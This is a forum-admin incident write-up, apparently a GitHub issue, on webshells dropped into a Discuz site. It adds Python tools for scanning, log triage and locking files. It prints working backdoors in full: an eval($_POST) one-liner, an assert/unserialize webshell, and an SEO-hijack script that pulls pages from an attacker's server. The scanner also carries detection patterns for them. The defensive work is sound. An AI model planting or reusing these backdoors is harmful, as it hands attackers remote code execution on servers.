
discuz 论坛被攻击以及应对方案记录

Open diamont1001 opened this issue 3 years ago • 0 comments

Discuz is an open-source PHP forum framework. Being open source means it can be used for free, but precisely because it is open source it is easy for people to study it and find vulnerabilities. That cannot be avoided; the only remedy is to patch quickly, and anyone running it has to be prepared for an ongoing tug of war with attackers.

Generally speaking, attachments, images and other uploads are the category that causes trouble most easily, because uploaded files end up on the server: even with security filtering, wherever there is code there will be vulnerabilities. So if conditions allow, I strongly recommend moving attachment uploads and the like off to a third-party storage service, for example Alibaba Cloud or OSS.

About chattr, the Linux command for locking (protecting) files

Before describing the temporary fixes below, it is worth introducing the chattr command and how to use it.

The details can be looked up on Baidu; what matters here is the -i flag, which means:

The file cannot be deleted, renamed or linked to, and nothing can be written or appended to it. The i attribute is very helpful for securing a file system.

  • Lock a file: chattr +i filename
  • Unlock a file: chattr -i filename
  • View attributes: lsattr filename

Finding PHP webshell (Trojan) files

The following commands will find webshell files:

# replace /data/wwwroot/bbs/ with the root directory of your discuz install
grep -r "php eval(" /data/wwwroot/bbs/
grep -r "eval(\$_POST" /data/wwwroot/bbs/

Usually this turns up a number of modified gif files in the image upload directory, for example:

image

Pick one at random and open it with vi xxx.gif:

image

The gif file has been tampered with: php code has clearly been appended at the end of the file. That is the malicious code.

OK, as long as you make sure that the files found above are not discuz's own files, i.e. that they are files in the image upload directory, you can simply delete them all.
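The two greps above only catch literal `eval($_POST` strings. As an added example (not code from the original post), here is a small webshell hunt that also catches the appended-php gif trick shown above and a few other backdoor primitives. The web root, file names and sample contents are constructed for the demonstration; the pattern list is my own and is not exhaustive.

```python
"""Webshell hunt over a Discuz web root.

Added example, not code from the original post. It extends the post's two
greps with checks for PHP code appended to image files (the tampered gifs
above) and for other backdoor primitives. The web root, file names and
sample contents below are constructed for the demonstration."""
import os
import re
import tempfile
from pathlib import Path
from typing import Dict, List

# Byte patterns typical of PHP backdoors; the first two mirror the post's greps.
SUSPICIOUS = [
    re.compile(rb"php\s+eval\("),
    re.compile(rb"eval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)"),
    re.compile(rb"assert\s*\(\s*\$"),                    # assert() evaluates strings on old PHP
    re.compile(rb"unserialize\s*\(\s*\$"),
    re.compile(rb"strrev\s*\(\s*'"),                     # reversed names to dodge simple greps
    re.compile(rb"(system|passthru|shell_exec)\s*\(\s*\$_"),
]
IMAGE_MAGIC = {b"GIF8": "gif", b"\x89PNG": "png", b"\xff\xd8\xff": "jpeg"}
PHP_EXT = {".php", ".phtml", ".inc"}

def scan_file(path: Path) -> List[str]:
    """Return findings for one file; an empty list means nothing looked wrong."""
    data = path.read_bytes()
    findings = []
    # 1. A real image header followed by a PHP open tag: the appended-php gif trick.
    for magic, kind in IMAGE_MAGIC.items():
        if data.startswith(magic) and b"<?php" in data:
            findings.append(f"php code inside {kind} image")
            break
    # 2. Any other non-PHP extension that still carries a PHP open tag.
    if not findings and path.suffix.lower() not in PHP_EXT and b"<?php" in data:
        findings.append("php tag in non-php file")
    # 3. Backdoor primitives, whatever the extension.
    for pat in SUSPICIOUS:
        if pat.search(data):
            findings.append("matches " + pat.pattern.decode())
    return findings

def scan_tree(root: Path) -> Dict[str, List[str]]:
    """Walk root; map each suspicious file (path relative to root) to its findings."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            found = scan_file(p)
            if found:
                report[p.relative_to(root).as_posix()] = found
    return report

def build_sample_root() -> Path:
    """Constructed web root: a clean script, a gif with php appended, an eval backdoor."""
    root = Path(tempfile.mkdtemp(prefix="bbs_"))
    (root / "data" / "attachment").mkdir(parents=True)
    (root / "index.php").write_bytes(b"<?php echo 'hello'; ?>")
    (root / "data" / "attachment" / "a.gif").write_bytes(
        b"GIF89a" + b"\x00" * 16 + b"<?php @eval($_POST['x']); ?>")
    (root / "news.php").write_bytes(b"<?php @eval($_POST[abc])?>")
    return root

if __name__ == "__main__":
    for rel, why in sorted(scan_tree(build_sample_root()).items()):
        print(rel, "->", "; ".join(why))
```

Run it against the real web root instead of the constructed one and review every hit by hand before deleting anything: the image check has no false positives worth worrying about, but the keyword patterns will also match legitimate code that calls unserialize() or assert().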

PS: Looking at the gif files found today gave me a start; see what they begin with!!!

image

Attack log

Below I record a few cases where I was attacked. I am not very deep in this area, so I never got to the bottom of tracing the vulnerabilities; these are only surface-level temporary fixes.

1. SEO attack

For a while I noticed that the site's traffic was abnormal: statistics showed that visits with search-engine user agents far exceeded normal visits.
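The statistic described above is easy to reproduce from the access log. The following is an added example (not code from the original post) that classifies requests by User-Agent and reports paths served almost exclusively to search-engine crawlers, which is how an SEO-hijack page such as vote.php stands out. The log lines, IP addresses and thresholds are constructed for the demonstration.

```python
"""Access-log triage for the crawler-traffic anomaly described above.

Added example, not code from the original post. It classifies requests by
User-Agent and reports paths that are served almost only to search-engine
crawlers. The log lines and IPs below are constructed, in combined log format."""
import re
from collections import defaultdict

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"')
CRAWLER_UA = re.compile(r"Googlebot|Baiduspider|bingbot|Sogou|YandexBot|360Spider", re.I)

def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def crawler_share_by_path(lines):
    """Map request path (query string dropped) -> (crawler_hits, total_hits)."""
    stats = defaultdict(lambda: [0, 0])
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]
        stats[path][1] += 1
        if CRAWLER_UA.search(rec["ua"]):
            stats[path][0] += 1
    return {p: (c, t) for p, (c, t) in stats.items()}

def suspicious_paths(lines, min_hits=5, min_share=0.8):
    """Paths with >= min_hits requests of which >= min_share came from crawlers."""
    out = {}
    for path, (crawl, total) in crawler_share_by_path(lines).items():
        if total >= min_hits and crawl / total >= min_share:
            out[path] = round(crawl / total, 2)
    return out

def _line(ip, path, ua):
    return (f'{ip} - - [27/Mar/2021:10:00:00 +0800] "GET {path} HTTP/1.1" 200 512 '
            f'"-" "{ua}"')

CHROME = "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 Chrome/89.0 Safari/537.36"
BAIDU = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
GOOGLE = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

# Constructed sample: normal forum browsing plus a burst of crawler hits on vote.php.
SAMPLE_LOG = (
    [_line("10.0.0.1", "/forum.php", CHROME) for _ in range(6)]
    + [_line("10.0.0.2", "/forum.php", BAIDU)]
    + [_line("66.249.1.1", f"/vote.php?id={i}", GOOGLE) for i in range(7)]
    + [_line("180.76.5.1", f"/vote.php?id={i}", BAIDU) for i in range(4)]
    + [_line("10.0.0.3", "/vote.php", CHROME)]
)

if __name__ == "__main__":
    for path, share in suspicious_paths(SAMPLE_LOG).items():
        print(f"{path}: {share:.0%} of requests came from crawler user agents")
```

A crawler User-Agent is trivially forged, so the share is a triage signal rather than proof; the point is that a file nobody links to from the forum itself should not be collecting crawler traffic at all.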

Nothing wrong was found in the php code, so the first thing to do was to look in the site's root directory for any newly added files:

ls -latr

There was indeed an extra .user.ini file in the site root. Its date showed it had been created recently, around the time the site started misbehaving, so there was clearly something fishy about it.

The definition of .user.ini can be looked up on Baidu; in short, .user.ini is a user-defined php.ini that PHP loads automatically.

Looking at the content of .user.ini, it defined php settings affecting how the site was served. I did not back it up, so I have forgotten the exact content.
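Since the post does not record what the file contained, here is an added example (not code from the original post) of what to look for in a stray .user.ini. The directives it flags (auto_prepend_file and friends) are an assumption based on how such files are commonly abused, not a record of the author's file; the sample ini text is constructed.

```python
""".user.ini audit.

Added example, not code from the original post. The post does not record
which directives the attacker's .user.ini contained, so the directives
flagged here are an assumption based on how stray .user.ini files are
commonly abused, not a record of the author's file. The sample is constructed."""
import configparser

# Directives a .user.ini is allowed to set (PHP_INI_PERDIR / PHP_INI_ALL) that
# let it pull attacker code into every request or redirect where PHP looks.
# PHP_INI_SYSTEM settings such as disable_functions are ignored in .user.ini,
# which is why they are not listed here.
RISKY_DIRECTIVES = {
    "auto_prepend_file": "runs the named file before every request (loads a dropped file)",
    "auto_append_file": "runs the named file after every request",
    "include_path": "redirects include()/require() lookups to another directory",
    "session.save_path": "moves session files somewhere the attacker can read or write",
}

def parse_user_ini(text):
    """Parse .user.ini, which has no section headers, into {directive: value}."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string("[php]\n" + text)          # configparser needs one section
    return dict(cp["php"])

def audit_user_ini(text):
    """Return (directive, value, reason) triples for anything that needs a look."""
    findings = []
    for key, value in parse_user_ini(text).items():
        k = key.strip().lower()
        v = value.strip().strip("\"'")
        if k in RISKY_DIRECTIVES:
            findings.append((k, v, RISKY_DIRECTIVES[k]))
        # A prepended file that is not .php is the appended-php gif trick in action.
        if k in ("auto_prepend_file", "auto_append_file") and not v.lower().endswith(".php"):
            findings.append((k, v, "points at a non-php file"))
    return findings

SAMPLE_INI = """\
; constructed sample, not the file found on the author's server
auto_prepend_file=/data/wwwroot/bbs/data/attachment/forum/x.gif
display_errors=Off
"""

if __name__ == "__main__":
    for directive, value, reason in audit_user_ini(SAMPLE_INI):
        print(f"{directive} = {value}: {reason}")
```

Whatever the file turns out to contain, the file it points at is the next thing to read: that is usually where the actual backdoor lives.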

I then deleted the file and thought that was that, but the next morning the problem was back: a .user.ini with the same content had reappeared. I chased it for a long time, but since I am not very familiar with either discuz or php I never found where the root of the problem was.

Since it could not be kept away, the next best thing was to change its content. But how to stop it from coming back?

  1. Empty the .user.ini file
  2. Lock the file with chattr: chattr +i .user.ini

After these steps the problem was solved.

2. The whole site turned into garbled text

Later another problem appeared: the whole site was showing garbled text. I looked for a long time without finding the cause, assuming some setting on the server had not taken effect, until I suddenly remembered the great universal fix: reboot the system.

Having "rebooted the system", I then applied universal fix number two: "clear the cache". After clearing it the site was, by luck, fixed this time. But it did not last: before long the site was garbled again, and over those few days the same problem was raised in the company chat group several times.

Well, no way round it. After clearing the cache once more I went looking for "new files", and sure enough there were three new files in the site root:

  • news.php
  • newfile.php
  • vote.php

The files' contents are as follows:

news.php

<?php @eval($_POST[abc])?>

Clearly news.php is a very simple backdoor: whatever string is sent in a POST parameter named abc is executed as php code. That is extremely dangerous, since for example a snippet that loops over directories and deletes them could be sent.

newfile.php

<?php
// Backdoor: the string held in $test is handed to assert() when the object is
// destroyed; assert() evaluates a string argument as PHP code on PHP 5 and 7
// (deprecated in 7.2, removed in 8.0).
class A{
    var $test = "demo";
    function __destruct(){
        assert($this->test);
    }
}
$pw=strrev('doog');               // parameter name is "good", reversed to dodge simple greps
$test = $_POST[$pw];              // attacker-supplied PHP code
$len = strlen($test)+1;           // +1 for the ";" appended below
// Hand-built serialized A object whose "test" property is the attacker's code
$pp = "O:1:\"A\":1:{s:4:\"test\";s:".$len.":\"".$test.";\";}";
$test_unser = unserialize($pp);   // __destruct fires when the object is released

?>

vote.php

<?php
// SEO hijack: fetches a page from an attacker-controlled server, passing this
// site's own URL, and echoes it back so crawlers see the attacker's content
// under this domain. Note the forced gb2312 charset on the response.
set_time_limit(0);
header("Content-Type: text/html;charset=gb2312");
$Rcaonidaye_vvcbbiB = "http://69.176.95.99/";   // attacker's server
$host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'];
$Content_mb=getHTTPPage($Rcaonidaye_vvcbbiB."/index.php?host=".$host_name);

function getHTTPPage($url) {
        $opts = array(
          'http'=>array(
                'method'=>"GET",
                'header'=>"User-Agent: aQ0O010O"
          )
        );
        $context = stream_context_create($opts);
        $html = @file_get_contents($url, false, $context);
        if (empty($html)) {
                exit("<p align='center'><font color='red'><b>Connection Error!</b></font></p>");
        }
        return $html;
}

echo $Content_mb;
?>

The "universal" fix: the chattr command

This time it was php code. I figured deleting it would be no use either, so I added a 404 header plus a return at the top of each of the files above and kept the rest of the content:

  1. Add this at the top of the file:
header('HTTP/1.1 404 Not Found');return;

// original file content
// ...

For example, news.php becomes:

<?php
header('HTTP/1.1 404 Not Found');return;
@eval($_POST[abc])?>
  2. Lock with the chattr command:
chattr +i news.php
chattr +i newfile.php
chattr +i vote.php
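The two steps above, as an added example (not code from the original post) that applies them to a list of files: insert the 404-plus-return stub right after the opening <?php tag, then chattr +i the file. The stub has to go in before the lock, because an immutable file cannot be edited, and chattr needs root and a file system that supports the immutable flag, so lock() verifies with lsattr instead of assuming success. The sample file is a constructed copy of news.php in a temp directory.

```python
"""Disarm-and-lock for dropped PHP files.

Added example, not code from the original post. It automates the two steps
above for a list of files. The sample file is constructed in a temp dir."""
import shutil
import subprocess
import tempfile
from pathlib import Path

STUB = "header('HTTP/1.1 404 Not Found');return;"

def neutralize(path):
    """Insert the stub after the first <?php tag. Returns True if the file changed.

    header() only works before any output and a top-level return ends the
    script, so the stub must be the first statement of the file."""
    text = path.read_text(encoding="utf-8", errors="replace")
    if STUB in text:
        return False                                   # already done: idempotent
    if not text.lstrip().startswith("<?php"):
        raise ValueError(f"{path}: no leading <?php tag; output before header() would defeat the stub")
    head, tag, tail = text.partition("<?php")
    path.write_text(head + tag + "\n" + STUB + "\n" + tail.lstrip(), encoding="utf-8")
    return True

def lock(path):
    """chattr +i the file; True only if lsattr afterwards shows the i flag."""
    if shutil.which("chattr") is None or shutil.which("lsattr") is None:
        return False
    if subprocess.run(["chattr", "+i", str(path)], capture_output=True).returncode != 0:
        return False                                   # not root, or fs without attrs
    out = subprocess.run(["lsattr", str(path)], capture_output=True, text=True).stdout
    flags = out.split()[0] if out.strip() else ""     # e.g. "----i---------e-------"
    return "i" in flags

def harden(paths):
    """Neutralize then lock each file; map path -> (stubbed, locked)."""
    return {str(p): (neutralize(p), lock(p)) for p in paths}

def build_sample():
    """Constructed copy of the news.php backdoor from the post, in a temp dir."""
    path = Path(tempfile.mkdtemp(prefix="bbs_")) / "news.php"
    path.write_text("<?php @eval($_POST[abc])?>", encoding="utf-8")
    return path

if __name__ == "__main__":
    sample = build_sample()
    print(harden([sample]))
    print(sample.read_text(encoding="utf-8"))
```

This only disarms the dropped files; whatever keeps writing them (the upload path, or the process that re-created .user.ini) is untouched, which is exactly why the post calls these temporary fixes.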

diamont1001 · Mar 27 '21 17:03